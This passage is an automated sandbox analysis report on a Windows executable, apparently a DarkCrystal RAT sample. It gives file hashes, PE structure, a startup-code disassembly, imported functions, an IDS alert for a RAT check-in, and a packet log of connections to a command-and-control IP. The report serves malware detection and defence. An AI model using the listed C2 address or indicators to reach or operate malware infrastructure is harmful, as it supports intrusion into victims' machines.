                                                                                SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                Malicious:false
                                                                                Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                Process:C:\Windows\System32\w32tm.exe
                                                                                File Type:ASCII text
                                                                                Category:dropped
                                                                                Size (bytes):151
                                                                                Entropy (8bit):4.811931423009686
                                                                                Encrypted:false
                                                                                SSDEEP:3:VLV993J+miJWEoJ8FXaTX9QuYs0vFfc2FEKvoYstNvj:Vx993DEURRBEvdFE1Ys
                                                                                MD5:4B3B1C43B680452CFB7E36A9F24E617E
                                                                                SHA1:09CD3AE7586EFCD28445A0EDA4E975525226E599
                                                                                SHA-256:6EC71241F2006CAE028F25988A5624701A2EF21D98B41530703E5F64EFF1AD19
                                                                                SHA-512:8B3DD178C49C5C2CE8428B76DDE1F56CCCEC75975F7E32FB9CD51B0C8DFAFD09060A14A737E057AE66543CEF01ECB7E7D4477B44C8378F2487445B47A9367ED8
                                                                                Malicious:false
                                                                                Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 11/01/2025 19:27:01..19:27:01, error: 0x80072746.19:27:06, error: 0x80072746.
                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                Entropy (8bit):7.918132581533177
                                                                                TrID:
                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                File name:OisrvsB6Ea.exe
                                                                                File size:1'899'080 bytes
                                                                                MD5:092f45dac00ef24f3836dbfe18dfa931
                                                                                SHA1:7583f7a96b649ff903b79615ac889fdd9c1fa94d
                                                                                SHA256:6bc67978f583db1ef99eb832b456c978b8c42a5233f9ed5810fed58455e6cd6f
                                                                                SHA512:a9ab5073a183f0a8994d805ac368f160775f899a0e1e9fe9a62ee4f6fd81d28ade5af06b5677cc5e13ffd0b5a54edd2c36576d5b44d88c6ffa3fc04bb4e64b78
                                                                                SSDEEP:49152:IBJ3w9opl/yaOHkGiQzblm+WsfjEjCAX+fgnlaNkGy+Ms:yhUopl/CCQzxm+rf4um+fklaGFs
                                                                                TLSH:23952301BAC294B1D47218724A785F2069BC7D215F75CEEB73A427ADEE229C0D7353E2
                                                                                Icon Hash:1515d4d4442f2d2d
                                                                                Entrypoint:0x41f530
                                                                                Entrypoint Section:.text
                                                                                Digitally signed:false
                                                                                Imagebase:0x400000
                                                                                Subsystem:windows gui
                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                                                                                TLS Callbacks:
                                                                                CLR (.Net) Version:
                                                                                OS Version Major:5
                                                                                OS Version Minor:1
                                                                                File Version Major:5
                                                                                File Version Minor:1
                                                                                Subsystem Version Major:5
                                                                                Subsystem Version Minor:1
                                                                                Import Hash:12e12319f1029ec4f8fcbed7e82df162
                                                                                Instruction
                                                                                call 00007FE835A06E6Bh
                                                                                jmp 00007FE835A0677Dh
                                                                                int3
                                                                                int3
                                                                                int3
                                                                                int3
                                                                                int3
                                                                                int3
                                                                                push ebp
                                                                                mov ebp, esp
                                                                                push esi
                                                                                push dword ptr [ebp+08h]
                                                                                mov esi, ecx
                                                                                call 00007FE8359F95C7h
                                                                                mov dword ptr [esi], 004356D0h
                                                                                mov eax, esi
                                                                                pop esi
                                                                                pop ebp
                                                                                retn 0004h
                                                                                and dword ptr [ecx+04h], 00000000h
                                                                                mov eax, ecx
                                                                                and dword ptr [ecx+08h], 00000000h
                                                                                mov dword ptr [ecx+04h], 004356D8h
                                                                                mov dword ptr [ecx], 004356D0h
                                                                                ret
                                                                                int3
                                                                                int3
                                                                                int3
                                                                                int3
                                                                                int3
                                                                                int3
                                                                                int3
                                                                                int3
                                                                                int3
                                                                                int3
                                                                                int3
                                                                                int3
                                                                                int3
                                                                                push ebp
                                                                                mov ebp, esp
                                                                                push esi
                                                                                mov esi, ecx
                                                                                lea eax, dword ptr [esi+04h]
                                                                                mov dword ptr [esi], 004356B8h
                                                                                push eax
                                                                                call 00007FE835A09C0Fh
                                                                                test byte ptr [ebp+08h], 00000001h
                                                                                pop ecx
                                                                                je 00007FE835A0690Ch
                                                                                push 0000000Ch
                                                                                push esi
                                                                                call 00007FE835A05EC9h
                                                                                pop ecx
                                                                                pop ecx
                                                                                mov eax, esi
                                                                                pop esi
                                                                                pop ebp
                                                                                retn 0004h
                                                                                push ebp
                                                                                mov ebp, esp
                                                                                sub esp, 0Ch
                                                                                lea ecx, dword ptr [ebp-0Ch]
                                                                                call 00007FE8359F9542h
                                                                                push 0043BEF0h
                                                                                lea eax, dword ptr [ebp-0Ch]
                                                                                push eax
                                                                                call 00007FE835A096C9h
                                                                                int3
                                                                                push ebp
                                                                                mov ebp, esp
                                                                                sub esp, 0Ch
                                                                                lea ecx, dword ptr [ebp-0Ch]
                                                                                call 00007FE835A06888h
                                                                                push 0043C0F4h
                                                                                lea eax, dword ptr [ebp-0Ch]
                                                                                push eax
                                                                                call 00007FE835A096ACh
                                                                                int3
                                                                                jmp 00007FE835A0B147h
                                                                                int3
                                                                                int3
                                                                                int3
                                                                                int3
                                                                                push 00422900h
                                                                                push dword ptr fs:[00000000h]
                                                                                Programming Language:
                                                                                • [ C ] VS2008 SP1 build 30729
                                                                                • [IMP] VS2008 SP1 build 30729
                                                                                Name | Virtual Address | Virtual Size | Is in Section
                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x3d070 | 0x34 | .rdata
                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3d0a4 | 0x50 | .rdata
                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x64000 | 0xdff8 | .rsrc
                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x72000 | 0x233c | .reloc
                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x3b11c | 0x54 | .rdata
                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                                                IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x355f8 | 0x40 | .rdata
                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                                                IMAGE_DIRECTORY_ENTRY_IAT | 0x33000 | 0x278 | .rdata
                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x3c5ec | 0x120 | .rdata
                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                                                Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                                                .text | 0x1000 | 0x31bdc | 0x31c00 | 2831bb8b11e3209658a53131886cdf98 | False | 0.5909380888819096 | data | 6.712962136932442 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                .rdata | 0x33000 | 0xaec0 | 0xb000 | 042f11346230ca5aa360727d9908e809 | False | 0.4579190340909091 | data | 5.261605615899847 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                .data | 0x3e000 | 0x24720 | 0x1000 | 9670b581969e508258d8bc903025de5e | False | 0.451416015625 | data | 4.387459135575936 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                .didat | 0x63000 | 0x190 | 0x200 | c83554035c63bb446c6208d0c8fa0256 | False | 0.4453125 | data | 3.3327310103022305 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                .rsrc | 0x64000 | 0xdff8 | 0xe000 | ba08fbcd0ed7d9e6a268d75148d9914b | False | 0.6373639787946429 | data | 6.638661032196024 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                .reloc | 0x72000 | 0x233c | 0x2400 | 40b5e17755fd6fdd34de06e5cdb7f711 | False | 0.7749565972222222 | data | 6.623012966548067 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                                                PNG | 0x64650 | 0xb45 | PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced | English | United States | 1.0027729636048528
                                                                                PNG | 0x65198 | 0x15a9 | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced | English | United States | 0.9363390441839495
                                                                                RT_ICON | 0x66748 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.47832369942196534
                                                                                RT_ICON | 0x66cb0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.5410649819494585
                                                                                RT_ICON | 0x67558 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.4933368869936034
                                                                                RT_ICON | 0x68400 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m | English | United States | 0.5390070921985816
                                                                                RT_ICON | 0x68868 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m | English | United States | 0.41393058161350843
                                                                                RT_ICON | 0x69910 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m | English | United States | 0.3479253112033195
                                                                                RT_ICON | 0x6beb8 | 0x3d71 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9809269502193401
                                                                                RT_DIALOG | 0x70588 | 0x286 | data | English | United States | 0.5092879256965944
                                                                                RT_DIALOG | 0x70358 | 0x13a | data | English | United States | 0.60828025477707
                                                                                RT_DIALOG | 0x70498 | 0xec | data | English | United States | 0.6991525423728814
                                                                                RT_DIALOG | 0x70228 | 0x12e | data | English | United States | 0.5927152317880795
                                                                                RT_DIALOG | 0x6fef0 | 0x338 | data | English | United States | 0.45145631067961167
                                                                                RT_DIALOG | 0x6fc98 | 0x252 | data | English | United States | 0.5757575757575758
                                                                                RT_STRING | 0x70f68 | 0x1e2 | data | English | United States | 0.3900414937759336
                                                                                RT_STRING | 0x71150 | 0x1cc | data | English | United States | 0.4282608695652174
                                                                                RT_STRING | 0x71320 | 0x1b8 | data | English | United States | 0.45681818181818185
                                                                                RT_STRING | 0x714d8 | 0x146 | data | English | United States | 0.5153374233128835
                                                                                RT_STRING | 0x71620 | 0x46c | data | English | United States | 0.3454063604240283
                                                                                RT_STRING | 0x71a90 | 0x166 | data | English | United States | 0.49162011173184356
                                                                                RT_STRING | 0x71bf8 | 0x152 | data | English | United States | 0.5059171597633136
                                                                                RT_STRING | 0x71d50 | 0x10a | data | English | United States | 0.49624060150375937
                                                                                RT_STRING | 0x71e60 | 0xbc | data | English | United States | 0.6329787234042553
                                                                                RT_STRING | 0x71f20 | 0xd6 | data | English | United States | 0.5747663551401869
                                                                                RT_GROUP_ICON | 0x6fc30 | 0x68 | data | English | United States | 0.7019230769230769
                                                                                RT_MANIFEST | 0x70810 | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3957333333333333
DLL | Import
KERNEL32.dll | GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
OLEAUT32.dll | SysAllocString, SysFreeString, VariantClear
gdiplus.dll | GdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-11T23:32:51.567229+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 49736 | 104.21.38.84 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                Jan 11, 2025 23:33:04.660953045 CET4976880192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:06.531430006 CET4976780192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:06.531451941 CET4976880192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:06.532157898 CET4978380192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:06.537041903 CET8049783104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:06.537663937 CET4978380192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:06.538461924 CET4978380192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:06.542126894 CET8049768104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:06.542223930 CET4976880192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:06.542224884 CET8049767104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:06.543277025 CET8049783104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:06.543417931 CET4976780192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:06.895519018 CET4978380192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:06.900451899 CET8049783104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:06.900557995 CET8049783104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:06.900587082 CET8049783104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:07.001715899 CET8049783104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:07.161010027 CET4978380192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:07.237212896 CET8049783104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:07.378983021 CET4978380192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:07.380065918 CET4979080192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:07.384383917 CET8049783104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:07.384459972 CET4978380192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:07.385060072 CET8049790104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:07.385143042 CET4979080192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:07.385251045 CET4979080192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:07.390120029 CET8049790104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:07.739288092 CET4979080192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:07.744261980 CET8049790104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:07.744299889 CET8049790104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:07.744328022 CET8049790104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:07.827342033 CET8049790104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:07.870578051 CET4979080192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:08.056376934 CET8049790104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:08.142602921 CET8049790104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:08.142683983 CET4979080192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:08.366354942 CET4979080192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:08.366642952 CET4979680192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:08.371606112 CET8049790104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:08.371643066 CET8049796104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:08.371671915 CET4979080192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:08.371722937 CET4979680192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:08.371855974 CET4979680192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:08.376691103 CET8049796104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:08.723547935 CET4979680192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:08.729044914 CET8049796104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:08.729077101 CET8049796104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:08.729104042 CET8049796104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:08.844157934 CET8049796104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:08.973464966 CET4979680192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:09.084268093 CET8049796104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:09.160964966 CET4979680192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:09.240649939 CET4979680192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:09.241211891 CET4980380192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:09.245942116 CET8049796104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:09.246052980 CET8049803104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:09.246114016 CET4979680192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:09.246144056 CET4980380192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:09.246273041 CET4980380192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:09.251086950 CET8049803104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:09.257546902 CET4980480192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:09.262641907 CET8049804104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:09.263468981 CET4980480192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:09.263638973 CET4980480192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:09.268491983 CET8049804104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:09.598551989 CET4980380192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:09.603477955 CET8049803104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:09.603537083 CET8049803104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:09.614195108 CET4980480192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:09.619096041 CET8049804104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:09.619127035 CET8049804104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:09.619153976 CET8049804104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:09.705621004 CET8049803104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:09.734811068 CET8049804104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:09.755250931 CET4980380192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:09.864095926 CET4980480192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:09.908478022 CET8049804104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:09.944005966 CET8049803104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:09.973467112 CET4980480192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:10.067203999 CET4980380192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:10.089345932 CET4980480192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:10.089426994 CET4980380192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:10.090162039 CET4980980192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:10.094480038 CET8049804104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:10.094543934 CET4980480192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:10.094825983 CET8049803104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:10.094862938 CET4980380192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:10.095158100 CET8049809104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:10.095225096 CET4980980192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:10.095331907 CET4980980192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:10.100151062 CET8049809104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:10.442336082 CET4980980192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:10.447465897 CET8049809104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:10.447499037 CET8049809104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:10.447530031 CET8049809104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:10.541765928 CET8049809104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:10.754272938 CET8049809104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:10.754383087 CET4980980192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:10.795636892 CET8049809104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:10.864191055 CET4980980192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:11.086530924 CET4980980192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:11.087342024 CET4981680192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:11.092089891 CET8049809104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:11.092206001 CET4980980192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:11.092228889 CET8049816104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:11.092314005 CET4981680192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:11.092509985 CET4981680192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:11.097460032 CET8049816104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:11.442289114 CET4981680192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:11.447264910 CET8049816104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:11.447336912 CET8049816104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:11.447365999 CET8049816104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:11.560729027 CET8049816104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:11.708693981 CET4981680192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:11.812782049 CET8049816104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:11.864082098 CET4981680192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:11.999037981 CET4981680192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:12.000479937 CET4982380192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:12.004177094 CET8049816104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:12.004276037 CET4981680192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:12.005351067 CET8049823104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:12.005446911 CET4982380192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:12.005724907 CET4982380192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:12.010565042 CET8049823104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:12.379863024 CET4982380192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:12.384958982 CET8049823104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:12.384999037 CET8049823104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:12.385031939 CET8049823104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:12.447149992 CET8049823104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:12.567220926 CET4982380192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:12.750646114 CET8049823104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:12.918018103 CET4982380192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:12.918320894 CET4983080192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:13.095062017 CET8049823104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:13.095133066 CET4982380192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:13.095648050 CET8049830104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:13.095736980 CET4983080192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:13.095876932 CET4983080192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:13.096177101 CET8049823104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:13.096237898 CET4982380192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:13.100660086 CET8049830104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:13.444513083 CET4983080192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:13.449860096 CET8049830104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:13.449894905 CET8049830104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:13.449923992 CET8049830104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:13.548526049 CET8049830104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:13.762217045 CET8049830104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:13.768101931 CET4983080192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:13.785037041 CET8049830104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:13.956191063 CET4983080192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:13.957000017 CET4983680192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:13.961357117 CET8049830104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:13.961438894 CET4983080192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:13.961879015 CET8049836104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:13.961951971 CET4983680192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:13.962224007 CET4983680192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:13.967014074 CET8049836104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:14.239698887 CET4983780192.168.2.4104.21.38.84
